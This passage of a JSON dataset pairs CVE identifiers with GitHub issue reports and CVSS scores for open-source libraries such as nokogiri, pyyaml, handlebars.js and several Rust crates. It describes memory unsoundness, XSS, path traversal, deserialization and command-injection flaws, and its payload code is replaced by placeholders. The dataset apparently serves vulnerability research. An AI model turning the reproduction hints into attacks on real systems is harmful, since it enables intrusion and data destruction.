  86818. "Issue_Url_old": "https://github.com/ihalila/pancurses/issues/66",
  86819. "Issue_Url_new": "https://github.com/ihalila/pancurses/issues/66",
  86820. "Repo_new": "ihalila/pancurses",
  86821. "Issue_Created_At": "2019-06-09T06:59:02Z",
  86822. "description": "mvprintw and printw should not be exposed. These take format strings, and make it trivial to cause memory safety issues that an attacker can exploit with URLTAG If you must expose them, they need to be marked as ERRORTAG .",
  86823. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  86824. "severity": "HIGH",
  86825. "baseScore": 7.5,
  86826. "impactScore": 3.6,
  86827. "exploitabilityScore": 3.9
  86828. },
  86829. {
  86830. "CVE_ID": "CVE-2020-35922",
  86831. "Issue_Url_old": "https://github.com/tokio-rs/mio/issues/1386",
  86832. "Issue_Url_new": "https://github.com/tokio-rs/mio/issues/1386",
  86833. "Repo_new": "tokio-rs/mio",
  86834. "Issue_Created_At": "2020-11-02T09:39:03Z",
  86835. "description": "APITAG assumes the layout of APITAG matches libc::sockaddr. MENTIONTAG noted this in URLTAG URLTAG As far as I can tell there are no guarantees from std about the layout of APITAG , and this code could silently compile and cause UB elsewhere if the representation changes (e.g. if padding is added early on in the struct, resulting in C code reading uninitialized bytes).",
  86836. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86837. "severity": "MEDIUM",
  86838. "baseScore": 5.5,
  86839. "impactScore": 3.6,
  86840. "exploitabilityScore": 1.8
  86841. },
  86842. {
  86843. "CVE_ID": "CVE-2019-16881",
  86844. "Issue_Url_old": "https://github.com/mvdnes/portaudio-rs/issues/20",
  86845. "Issue_Url_new": "https://github.com/mvdnes/portaudio-rs/issues/20",
  86846. "Repo_new": "mvdnes/portaudio-rs",
  86847. "Issue_Created_At": "2019-09-13T16:53:01Z",
  86848. "description": "Stream callback procedure is not unwind safe. It is observed that the APITAG and APITAG functions are not unwind safe, as shown in their definitions below. ERRORTAG If the user provided closure could possibly panic, the APITAG of boxed APITAG would not be reachable, which causes its memory to be deallocated, thus resulting in a use-after-free. Since the APITAG contains two function pointers which might be executed later on, it is obvious that arbitrary code execution could be constructed maliciously this way. Therefore, this is a serious vulnerability and should be fixed.",
  86849. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86850. "severity": "CRITICAL",
  86851. "baseScore": 9.8,
  86852. "impactScore": 5.9,
  86853. "exploitabilityScore": 3.9
  86854. },
  86855. {
  86856. "CVE_ID": "CVE-2020-35903",
  86857. "Issue_Url_old": "https://github.com/elrnv/dync/issues/4",
  86858. "Issue_Url_new": "https://github.com/elrnv/dync/issues/4",
  86859. "Repo_new": "elrnv/dync",
  86860. "Issue_Created_At": "2020-09-27T18:47:27Z",
  86861. "description": "APITAG allows for misaligned access. Hey there, I noticed that in APITAG the backing storage for the Vec is a APITAG . URLTAG I believe this lets you trigger undefined behavior in the form of misaligned memory access through safe rust code by instantiating a APITAG with a type that has different alignment requirements from APITAG . Running the following program under miri URLTAG : ERRORTAG results in: ERRORTAG",
  86862. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86863. "severity": "MEDIUM",
  86864. "baseScore": 5.5,
  86865. "impactScore": 3.6,
  86866. "exploitabilityScore": 1.8
  86867. },
  86868. {
  86869. "CVE_ID": "CVE-2020-36452",
  86870. "Issue_Url_old": "https://github.com/L117/array-tools/issues/2",
  86871. "Issue_Url_new": "https://github.com/l117/array-tools/issues/2",
  86872. "Repo_new": "L117/array-tools",
  86873. "Issue_Created_At": "2021-01-01T00:51:21Z",
  86874. "description": "APITAG can cause dropping uninitialized memory. Hello \ud83e\udd80 , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG URLTAG If the APITAG (user supplied APITAG ) panics within APITAG , then APITAG with its uninitialized APITAG is dropped. The Drop impl of APITAG assumes that APITAG is a properly initialized array, and thus APITAG can be invoked on an uninitialized memory blob. Thank you for checking out this issue NUMBERTAG",
  86875. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86876. "severity": "CRITICAL",
  86877. "baseScore": 9.8,
  86878. "impactScore": 5.9,
  86879. "exploitabilityScore": 3.9
  86880. },
  86881. {
  86882. "CVE_ID": "CVE-2020-36448",
  86883. "Issue_Url_old": "https://github.com/krl/cache/issues/1",
  86884. "Issue_Url_new": "https://github.com/krl/cache/issues/1",
  86885. "Repo_new": "krl/cache",
  86886. "Issue_Created_At": "2020-11-24T18:56:44Z",
  86887. "description": "Cache's Send trait and Sync trait should have bounds. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the Cache object implements the Send and Sync traits for all types: URLTAG However, this should also probably be bounded by K: Send and K: Sync. Otherwise, it's possible to smuggle non Send types across thread boundaries or share non Sync types across thread boundaries. Here's an example of a data race in safe Rust code through a Cache. ERRORTAG",
  86888. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86889. "severity": "HIGH",
  86890. "baseScore": 8.1,
  86891. "impactScore": 5.9,
  86892. "exploitabilityScore": 2.2
  86893. },
  86894. {
  86895. "CVE_ID": "CVE-2020-35919",
  86896. "Issue_Url_old": "https://github.com/deprecrated/net2-rs/issues/105",
  86897. "Issue_Url_new": "https://github.com/deprecrated/net2-rs/issues/105",
  86898. "Repo_new": "deprecrated/net2-rs",
  86899. "Issue_Created_At": "2020-11-07T13:33:08Z",
  86900. "description": "net2 assumes the layout of APITAG matches libc::sockaddr. The problem code is here: URLTAG It assumes that the layout of APITAG matches APITAG , but this can't be assumed. Related issues: URLTAG URLTAG URLTAG Mio has roughly the same code, this was fixed in URLTAG for socket2: URLTAG",
  86901. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86902. "severity": "MEDIUM",
  86903. "baseScore": 5.5,
  86904. "impactScore": 3.6,
  86905. "exploitabilityScore": 1.8
  86906. },
  86907. {
  86908. "CVE_ID": "CVE-2020-36438",
  86909. "Issue_Url_old": "https://github.com/KizzyCode/tiny_future/issues/1",
  86910. "Issue_Url_new": "https://github.com/kizzycode/tiny_future-rust/issues/1",
  86911. "Repo_new": "kizzycode/tiny_future-rust",
  86912. "Issue_Created_At": "2020-12-08T05:17:36Z",
  86913. "description": "Send and Sync traits for Future should be bound by APITAG . Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that tiny_future implements Send and Sync for all types: URLTAG This should probably be bound by APITAG , otherwise this allows non Send types such as Rc to be sent across thread boundaries which might invoke undefined behavior. Here's an example of this in action with an Rc segfaulting safe Rust code: ERRORTAG Output: APITAG",
  86914. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86915. "severity": "HIGH",
  86916. "baseScore": 8.1,
  86917. "impactScore": 5.9,
  86918. "exploitabilityScore": 2.2
  86919. },
  86920. {
  86921. "CVE_ID": "CVE-2021-26307",
  86922. "Issue_Url_old": "https://github.com/gz/rust-cpuid/issues/40",
  86923. "Issue_Url_new": "https://github.com/gz/rust-cpuid/issues/40",
  86924. "Repo_new": "gz/rust-cpuid",
  86925. "Issue_Created_At": "2021-01-17T16:49:24Z",
  86926. "description": "Incorrect (and probably unsound) transmutes. The code contains several transmutes similar to this: ERRORTAG Reading about FILETAG , this is not correct, because the Rust compiler is free to reorder the fields of the struct. It is also probably unsound, because the Rust compiler is free to add padding. Adding APITAG may be a fix. However I am not sure what role endianness plays here (same question as NUMBERTAG",
  86927. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86928. "severity": "MEDIUM",
  86929. "baseScore": 5.5,
  86930. "impactScore": 3.6,
  86931. "exploitabilityScore": 1.8
  86932. },
  86933. {
  86934. "CVE_ID": "CVE-2021-45708",
  86935. "Issue_Url_old": "https://github.com/TimelyDataflow/abomonation/issues/23",
  86936. "Issue_Url_new": "https://github.com/timelydataflow/abomonation/issues/23",
  86937. "Repo_new": "timelydataflow/abomonation",
  86938. "Issue_Created_At": "2019-09-19T17:22:07Z",
  86939. "description": "Can the pointer alignment situation be improved?. As the docs say, abomonation currently doesn't guarantee correct pointer alignment. This is pretty dangerous, even on NUMBERTAG as rustc might be tempted to generate those evil SIMD instructions that assume the data is aligned and raise an exception otherwise someday. I wonder if there is an API tweak we could use to improve upon this situation?",
  86940. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  86941. "severity": "HIGH",
  86942. "baseScore": 7.5,
  86943. "impactScore": 3.6,
  86944. "exploitabilityScore": 3.9
  86945. },
  86946. {
  86947. "CVE_ID": "CVE-2021-26601",
  86948. "Issue_Url_old": "https://github.com/ImpressCMS/impresscms/issues/914",
  86949. "Issue_Url_new": "https://github.com/impresscms/impresscms/issues/914",
  86950. "Repo_new": "impresscms/impresscms",
  86951. "Issue_Created_At": "2021-02-02T21:54:17Z",
  86952. "description": "Arbitrary File Deletion via Path Traversal in FILETAG . Link : URLTAG Date NUMBERTAG UTC By : egix Weakness : Path Traversal Details : Summary: The vulnerability is located in the APITAG script: ERRORTAG User input passed through the \"image_temp\" parameter is not properly sanitized before being used in a call to the ERRORTAG function at lines NUMBERTAG and NUMBERTAG This can be exploited to carry out Path Traversal attacks and delete arbitrary files in the context of the web server process. NOTE : before being deleted, the file will be copied into the APITAG directory. As such, by firstly deleting the APITAG file in that directory, it might be possible to disclose the content of arbitrary files in case the web server allows for directory listing. APITAG branch : The vulnerability has been tested and confirmed on APITAG version NUMBERTAG the latest at the time of writing). Steps To Reproduce NUMBERTAG Login into the application as any user (this should work both for Webmasters and Registered Users NUMBERTAG Go to: APITAG NUMBERTAG The APITAG script will be deleted, rendering the website unusable Impact This vulnerability might allow authenticated attackers to delete arbitrary files, potentially leading to a Denial of Service APITAG condition or destruction of users data.",
  86953. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  86954. "severity": "HIGH",
  86955. "baseScore": 8.1,
  86956. "impactScore": 5.2,
  86957. "exploitabilityScore": 2.8
  86958. },
  86959. {
  86960. "CVE_ID": "CVE-2019-15602",
  86961. "Issue_Url_old": "https://github.com/itworkcenter/fileview/issues/1",
  86962. "Issue_Url_new": "https://github.com/itworkcenter/fileview/issues/1",
  86963. "Repo_new": "itworkcenter/fileview",
  86964. "Issue_Created_At": "2019-07-09T20:53:59Z",
  86965. "description": "Security Issue. I'm a member of the FILETAG Foundation Security Working Group and we received a report of a vulnerability in this module. We tried inviting the author by e mail but received no response so I'm opening this issue and inviting anyone with commit and npm publish rights to collaborate with us on a fix.",
  86966. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  86967. "severity": "MEDIUM",
  86968. "baseScore": 6.1,
  86969. "impactScore": 2.7,
  86970. "exploitabilityScore": 2.8
  86971. },
  86972. {
  86973. "CVE_ID": "CVE-2019-19919",
  86974. "Issue_Url_old": "https://github.com/wycats/handlebars.js/issues/1558",
  86975. "Issue_Url_new": "https://github.com/handlebars-lang/handlebars.js/issues/1558",
  86976. "Repo_new": "handlebars-lang/handlebars.js",
  86977. "Issue_Created_At": "2019-09-21T13:43:28Z",
  86978. "description": "Disallow calling APITAG and APITAG directly. The recent remote code execution exploits were misusing the helper APITAG in order to call methods from object prototypes that actually should not have been called. The helpers APITAG and APITAG are not meant to be called directly.",
  86979. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86980. "severity": "CRITICAL",
  86981. "baseScore": 9.8,
  86982. "impactScore": 5.9,
  86983. "exploitabilityScore": 3.9
  86984. },
  86985. {
  86986. "CVE_ID": "CVE-2015-8857",
  86987. "Issue_Url_old": "https://github.com/mishoo/UglifyJS2/issues/751",
  86988. "Issue_Url_new": "https://github.com/mishoo/uglifyjs/issues/751",
  86989. "Repo_new": "mishoo/uglifyjs",
  86990. "Issue_Created_At": "2015-07-21T22:25:26Z",
  86991. "description": "uglify c changes behavior of mdast code. I've created a repo to reproduce this bug: URLTAG For the mdast URLTAG markdown library, the source succeeds when not uglified, and then, passed through APITAG , its behavior changes and it breaks. I'm trying to dig through the source, passed through APITAG and then APITAG , in order to track down the cause. It's quite a doozy",
  86992. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86993. "severity": "CRITICAL",
  86994. "baseScore": 9.8,
  86995. "impactScore": 5.9,
  86996. "exploitabilityScore": 3.9
  86997. },
  86998. {
  86999. "CVE_ID": "CVE-2019-5786",
  87000. "Issue_Url_old": "https://github.com/GoogleChrome/puppeteer/issues/4141",
  87001. "Issue_Url_new": "https://github.com/puppeteer/puppeteer/issues/4141",
  87002. "Repo_new": "puppeteer/puppeteer",
  87003. "Issue_Created_At": "2019-03-08T20:06:56Z",
  87004. "description": "CVETAG . Just wanted to quickly verify if master || APITAG has a patch for this vulnerability since all external docs point to a major version that's not where pptr is at. Since I'm not familiar with how changes are backported/forward ported, and most folks here probably aren't as well, it'd be great to get a sense of whether pptr is affected. Thanks!",
  87005. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  87006. "severity": "MEDIUM",
  87007. "baseScore": 6.5,
  87008. "impactScore": 3.6,
  87009. "exploitabilityScore": 2.8
  87010. },
  87011. {
  87012. "CVE_ID": "CVE-2015-8856",
  87013. "Issue_Url_old": "https://github.com/expressjs/serve-index/issues/28",
  87014. "Issue_Url_new": "https://github.com/expressjs/serve-index/issues/28",
  87015. "Repo_new": "expressjs/serve-index",
  87016. "Issue_Created_At": "2015-03-14T01:21:57Z",
  87017. "description": "XSS via filename. serve index directory listings are vulnerable to XSS via arbitrary uploader controlled filenames. Repro steps NUMBERTAG Run URLTAG NUMBERTAG APITAG NUMBERTAG ERRORTAG NUMBERTAG Load the serve index server in Chrome NUMBERTAG see an alert box I spotted this when testing webpack dev server, which is also vulnerable as it uses serve index.",
  87018. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  87019. "severity": "MEDIUM",
  87020. "baseScore": 6.1,
  87021. "impactScore": 2.7,
  87022. "exploitabilityScore": 2.8
  87023. },
  87024. {
  87025. "CVE_ID": "CVE-2020-7691",
  87026. "Issue_Url_old": "https://github.com/MrRio/jsPDF/issues/2971",
  87027. "Issue_Url_new": "https://github.com/parallax/jspdf/issues/2971",
  87028. "Repo_new": "parallax/jspdf",
  87029. "Issue_Created_At": "2020-10-20T19:40:50Z",
  87030. "description": "Address CVETAG ( very similar to CVETAG ). Hello! This vulnerability is very similar to NUMBERTAG so I think it should be already fixed. The fact is that gemnasium that is dependency scanner is warning about this issue: + + + | Severity | Medium | | Identifier | CVETAG | | URL | URLTAG | | Scanner | gemnasium | | Message | Cross site Scripting in jspdf | | Package | jspdf NUMBERTAG Solution | Unfortunately, there is no solution available yet. | | Path | | | File | APITAG | + + + And it is very similar to the one that was solved in the mentioned issue, so I don't know if there is something needed to do. I did a test and it is working well FILETAG If you could do a quick check I will appreciate it. Thank you!",
  87031. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  87032. "severity": "MEDIUM",
  87033. "baseScore": 6.1,
  87034. "impactScore": 2.7,
  87035. "exploitabilityScore": 2.8
  87036. },
  87037. {
  87038. "CVE_ID": "CVE-2016-5682",
  87039. "Issue_Url_old": "https://github.com/swagger-api/swagger-ui/issues/1865",
  87040. "Issue_Url_new": "https://github.com/swagger-api/swagger-ui/issues/1865",
  87041. "Repo_new": "swagger-api/swagger-ui",
  87042. "Issue_Created_At": "2016-01-13T04:45:25Z",
  87043. "description": "Property names are not escaped and allow XSS. To reproduce, point swagger ui at a JSON schema file that uses a model with a property containing \" APITAG alert NUMBERTAG APITAG \". The script will execute. I've attached a sinatra server that demonstrates the issue by replacing the APITAG property with APITAG APITAG : URLTAG",
  87044. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  87045. "severity": "MEDIUM",
  87046. "baseScore": 6.1,
  87047. "impactScore": 2.7,
  87048. "exploitabilityScore": 2.8
  87049. },
  87050. {
  87051. "CVE_ID": "CVE-2017-5941",
  87052. "Issue_Url_old": "https://github.com/luin/serialize/issues/4",
  87053. "Issue_Url_new": "https://github.com/luin/serialize/issues/4",
  87054. "Repo_new": "luin/serialize",
  87055. "Issue_Created_At": "2017-02-09T08:09:14Z",
  87056. "description": "APITAG can be abused to achieve arbitrary code injection with an IIFE. ERRORTAG I don't know if this is a functionality as you are using APITAG internally, but the module should not execute code on deserialization.",
  87057. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  87058. "severity": "CRITICAL",
  87059. "baseScore": 9.8,
  87060. "impactScore": 5.9,
  87061. "exploitabilityScore": 3.9
  87062. },
  87063. {
  87064. "CVE_ID": "CVE-2020-8268",
  87065. "Issue_Url_old": "https://github.com/sonnyp/JSON8/issues/113",
  87066. "Issue_Url_new": "https://github.com/sonnyp/json8/issues/113",
  87067. "Repo_new": "sonnyp/json8",
  87068. "Issue_Created_At": "2020-09-12T11:51:50Z",
  87069. "description": "Prototype Pollution Vulnerability in \"json8 merge patch\". Prototype Pollution This package fails to restrict access to prototypes of objects, allowing for modification of prototype behavior, which may allow obtaining sensitive PATHTAG If required I can submit a POC through a secured channel. Thanks.",
  87070. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  87071. "severity": "HIGH",
  87072. "baseScore": 7.5,
  87073. "impactScore": 3.6,
  87074. "exploitabilityScore": 3.9
  87075. },
  87076. {
  87077. "CVE_ID": "CVE-2021-23732",
  87078. "Issue_Url_old": "https://github.com/Quobject/docker-cli-js/issues/22",
  87079. "Issue_Url_new": "https://github.com/quobject/docker-cli-js/issues/22",
  87080. "Repo_new": "quobject/docker-cli-js",
  87081. "Issue_Created_At": "2021-11-11T20:38:01Z",
  87082. "description": "Document lack of sanitization. This code appears to use child processes but doesn't sanitize the input. A project I was working on used this code for something like the following to run something in a container of the user's choosing: APITAG If the user just entered a semicolon after the container name, they could easily inject/run arbitrary commands on the host machine. It's easy enough to only allow valid container names and nothing more in this instance, but the problem was not knowing that there was no sanitization being done behind the scenes. A more ambitious goal might be to make sure no malicious user input can get through, but until that's implemented there should at least be a note in the documentation about it.",
  87083. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
  87084. "severity": "CRITICAL",
  87085. "baseScore": 9.0,
  87086. "impactScore": 6.0,
  87087. "exploitabilityScore": 2.2
  87088. },
  87089. {
  87090. "CVE_ID": "CVE-2018-16472",
  87091. "Issue_Url_old": "https://github.com/ashaffer/cached-path-relative/issues/3",
  87092. "Issue_Url_new": "https://github.com/ashaffer/cached-path-relative/issues/3",
  87093. "Repo_new": "ashaffer/cached-path-relative",
  87094. "Issue_Created_At": "2018-09-07T07:05:45Z",
  87095. "description": "Security issue. Hello, As a member of the\u00a0 FILETAG Security WG URLTAG I would like to draw your attention to a security report that has been made regarding this package. I have made attempts to contact the person identified as a maintainer of this package but did not get any answer. What is the best way to reach someone with commit rights over this repo and hopefully npm publishing rights as well, in order to invite them to privately discuss the issue on the APITAG platform and provide a resolution? Thanks, Liran References: FILETAG \u00a0",
  87096. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87097. "severity": "HIGH",
  87098. "baseScore": 7.5,
  87099. "impactScore": 3.6,
  87100. "exploitabilityScore": 3.9
  87101. },
  87102. {
  87103. "CVE_ID": "CVE-2019-15138",
  87104. "Issue_Url_old": "https://github.com/marcbachmann/node-html-pdf/issues/530",
  87105. "Issue_Url_new": "https://github.com/marcbachmann/node-html-pdf/issues/530",
  87106. "Repo_new": "marcbachmann/node-html-pdf",
  87107. "Issue_Created_At": "2019-09-18T21:37:31Z",
  87108. "description": "npm audit vulnerability . Hey there, an npm advisory is out for this package. URLTAG Is there any timeline to resolve this?",
  87109. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  87110. "severity": "HIGH",
  87111. "baseScore": 7.5,
  87112. "impactScore": 3.6,
  87113. "exploitabilityScore": 3.9
  87114. },
  87115. {
  87116. "CVE_ID": "CVE-2019-13118",
  87117. "Issue_Url_old": "https://github.com/sparklemotion/nokogiri/issues/1943",
  87118. "Issue_Url_new": "https://github.com/sparklemotion/nokogiri/issues/1943",
  87119. "Repo_new": "sparklemotion/nokogiri",
  87120. "Issue_Created_At": "2019-11-17T17:57:50Z",
  87121. "description": "Investigate libxslt vulnerabilities patched in USN NUMBERTAG This issue is to drive investigation and potential action around a set of upstream patches that Canonical judged valuable enough to port to their distributions. References: URLTAG FILETAG PATHTAG CVETAG .html FILETAG PATHTAG CVETAG .html FILETAG PATHTAG CVETAG .html",
  87122. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  87123. "severity": "HIGH",
  87124. "baseScore": 7.5,
  87125. "impactScore": 3.6,
  87126. "exploitabilityScore": 3.9
  87127. },
  87128. {
  87129. "CVE_ID": "CVE-2020-7595",
  87130. "Issue_Url_old": "https://github.com/sparklemotion/nokogiri/issues/1992",
  87131. "Issue_Url_new": "https://github.com/sparklemotion/nokogiri/issues/1992",
  87132. "Repo_new": "sparklemotion/nokogiri",
  87133. "Issue_Created_At": "2020-02-10T15:42:05Z",
  87134. "description": "Investigate libxml2 vulnerabilities patched in USN NUMBERTAG This issue is to drive investigation and potential action around a set of upstream patches that Canonical judged valuable enough to port to their distributions. References: URLTAG FILETAG PATHTAG CVETAG .html FILETAG PATHTAG CVETAG .html Summary To be filed in as investigation proceeds History of this notification NUMBERTAG USN NUMBERTAG published by Canonical NUMBERTAG this github issue created",
  87135. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87136. "severity": "HIGH",
  87137. "baseScore": 7.5,
  87138. "impactScore": 3.6,
  87139. "exploitabilityScore": 3.9
  87140. },
  87141. {
  87142. "CVE_ID": "CVE-2021-3517",
  87143. "Issue_Url_old": "https://github.com/sparklemotion/nokogiri/issues/2233",
  87144. "Issue_Url_new": "https://github.com/sparklemotion/nokogiri/issues/2233",
  87145. "Repo_new": "sparklemotion/nokogiri",
  87146. "Issue_Created_At": "2021-05-13T16:59:41Z",
  87147. "description": "Upgrade packaged libxml2 to NUMBERTAG libxml NUMBERTAG was released today NUMBERTAG Let's plan on upgrading to it for the next release. [ ] update APITAG [ ] remove patches that are no longer needed, ensure remaining patches apply cleanly [ ] get all the tests green, particularly under valgrind",
  87148. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
  87149. "severity": "HIGH",
  87150. "baseScore": 8.6,
  87151. "impactScore": 4.7,
  87152. "exploitabilityScore": 3.9
  87153. },
  87154. {
  87155. "CVE_ID": "CVE-2021-3517",
  87156. "Issue_Url_old": "https://github.com/sparklemotion/nokogiri/issues/2274",
  87157. "Issue_Url_new": "https://github.com/sparklemotion/nokogiri/issues/2274",
  87158. "Repo_new": "sparklemotion/nokogiri",
  87159. "Issue_Created_At": "2021-06-17T21:44:25Z",
  87160. "description": "Investigate libxml2 vulnerabilities patched in USN NUMBERTAG This issue is to drive investigation and potential action around a set of upstream patches that Canonical judged valuable enough to backport to their distributions using a NUMBERTAG based version. References: URLTAG APITAG that it seems likely these are all backports from NUMBERTAG APITAG which Nokogiri is already using, but this issue exists so that I check that assumption.) History of this notication NUMBERTAG issue created after USN was issued",
  87161. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
  87162. "severity": "HIGH",
  87163. "baseScore": 8.6,
  87164. "impactScore": 4.7,
  87165. "exploitabilityScore": 3.9
  87166. },
  87167. {
  87168. "CVE_ID": "CVE-2019-11068",
  87169. "Issue_Url_old": "https://github.com/sparklemotion/nokogiri/issues/1892",
  87170. "Issue_Url_new": "https://github.com/sparklemotion/nokogiri/issues/1892",
  87171. "Repo_new": "sparklemotion/nokogiri",
  87172. "Issue_Created_At": "2019-04-16T03:39:10Z",
  87173. "description": "Investigate Ubuntu libxslt patches in USN NUMBERTAG and USN NUMBERTAG This issue is to drive investigation and potential action around a set of upstream patches that Canonical judged valuable enough to port to their distributions. References: URLTAG URLTAG FILETAG PATHTAG CVETAG .html Summary (kept up to date): Next steps: investigate the medium CVE and upstream commits and determine if the patches have already been applied and if not, whether we should include them in the Nokogiri vendored distribution of libxslt.",
  87174. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  87175. "severity": "CRITICAL",
  87176. "baseScore": 9.8,
  87177. "impactScore": 5.9,
  87178. "exploitabilityScore": 3.9
  87179. },
  87180. {
  87181. "CVE_ID": "CVE-2019-16865",
  87182. "Issue_Url_old": "https://github.com/python-pillow/Pillow/issues/4123",
  87183. "Issue_Url_new": "https://github.com/python-pillow/pillow/issues/4123",
  87184. "Repo_new": "python-pillow/pillow",
  87185. "Issue_Created_At": "2019-10-07T14:09:34Z",
  87186. "description": "Question regarding CVETAG . Hi, I am looking at CVETAG NUMBERTAG reported against the new NUMBERTAG release, but the information about it is quite limited and I could not find a specific mention in git log. In addition the Changelog does not seem to mention anything specifically security related. Would it be possible to elaborate a bit about the issue and maybe point to a commit fixing the issue ? Thanks in advance NUMBERTAG URLTAG",
  87187. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87188. "severity": "HIGH",
  87189. "baseScore": 7.5,
  87190. "impactScore": 3.6,
  87191. "exploitabilityScore": 3.9
  87192. },
  87193. {
  87194. "CVE_ID": "CVE-2014-1938",
  87195. "Issue_Url_old": "https://github.com/alex/rply/issues/42",
  87196. "Issue_Url_new": "https://github.com/alex/rply/issues/42",
  87197. "Repo_new": "alex/rply",
  87198. "Issue_Created_At": "2015-09-01T04:42:03Z",
  87199. "description": "CVETAG : still uses /tmp insecurely (forwarding from Debian BTS NUMBERTAG Hello, There has been a security issue reported at Debian against rply. This issue is more than a year old. Can this be fixed by upstream?. CVETAG",
  87200. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  87201. "severity": "MEDIUM",
  87202. "baseScore": 5.5,
  87203. "impactScore": 3.6,
  87204. "exploitabilityScore": 1.8
  87205. },
  87206. {
  87207. "CVE_ID": "CVE-2020-14343",
  87208. "Issue_Url_old": "https://github.com/yaml/pyyaml/issues/420",
  87209. "Issue_Url_new": "https://github.com/yaml/pyyaml/issues/420",
  87210. "Repo_new": "yaml/pyyaml",
  87211. "Issue_Created_At": "2020-07-22T08:18:35Z",
  87212. "description": "APITAG and APITAG still vulnerable to fairly trivial RCE. As of NUMBERTAG APITAG defaults to using APITAG and APITAG is still vulnerable to fairly trivial RCE. Some example payloads: APITAG APITAG CODETAG I do not believe this is entirely fixable unless APITAG finally decided to use secure defaults, and make APITAG equivalent to APITAG APITAG should probably be removed entirely, as I don't see the purpose of it.",
  87213. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  87214. "severity": "CRITICAL",
  87215. "baseScore": 9.8,
  87216. "impactScore": 5.9,
  87217. "exploitabilityScore": 3.9
  87218. },
  87219. {
  87220. "CVE_ID": "CVE-2019-5063",
  87221. "Issue_Url_old": "https://github.com/opencv/opencv/issues/16951",
  87222. "Issue_Url_new": "https://github.com/opencv/opencv/issues/16951",
  87223. "Repo_new": "opencv/opencv",
  87224. "Issue_Created_At": "2020-04-02T04:40:24Z",
  87225. "description": "null pointer dereference and buffer overflow: APITAG NUMBERTAG System information (version) APITAG NUMBERTAG Operating System / Platform => Win NUMBERTAG Detailed description There appear to be several places where a nullptr dereference can occur in core(persistence). These have been listed as security vulnerabilities in URLTAG It appears they were fixed in APITAG but not in APITAG NUMBERTAG see issue URLTAG and pull request URLTAG Similarly, another security bug is listed here URLTAG where a buffer overflow can occur. It appears that URLTAG fixes all locations where buffer overflow can happen in master, but in the NUMBERTAG branch and in NUMBERTAG releases, the fixes were not added (ie URLTAG in NUMBERTAG s URLTAG in master) As these are both bugs, can we have these fixes back ported to Open C NUMBERTAG",
  87226. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  87227. "severity": "HIGH",
  87228. "baseScore": 8.8,
  87229. "impactScore": 5.9,
  87230. "exploitabilityScore": 2.8
  87231. },
  87232. {
  87233. "CVE_ID": "CVE-2021-44549",
  87234. "Issue_Url_old": "https://github.com/eclipse-ee4j/mail/issues/429",
  87235. "Issue_Url_new": "https://github.com/jakartaee/mail-api/issues/429",
  87236. "Repo_new": "jakartaee/mail-api",
  87237. "Issue_Created_At": "2020-03-13T08:49:10Z",
  87238. "description": "Hostname validation for certificates should be enabled by default. APITAG NUMBERTAG specifications has hostname validation of certificates disabled by default NUMBERTAG This is a very insecure default configuration, and opposite to what would be expected as a default. As part of Jakarta Mail NUMBERTAG this should be changed to be secure by default NUMBERTAG APITAG defaults to false",
  87239. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
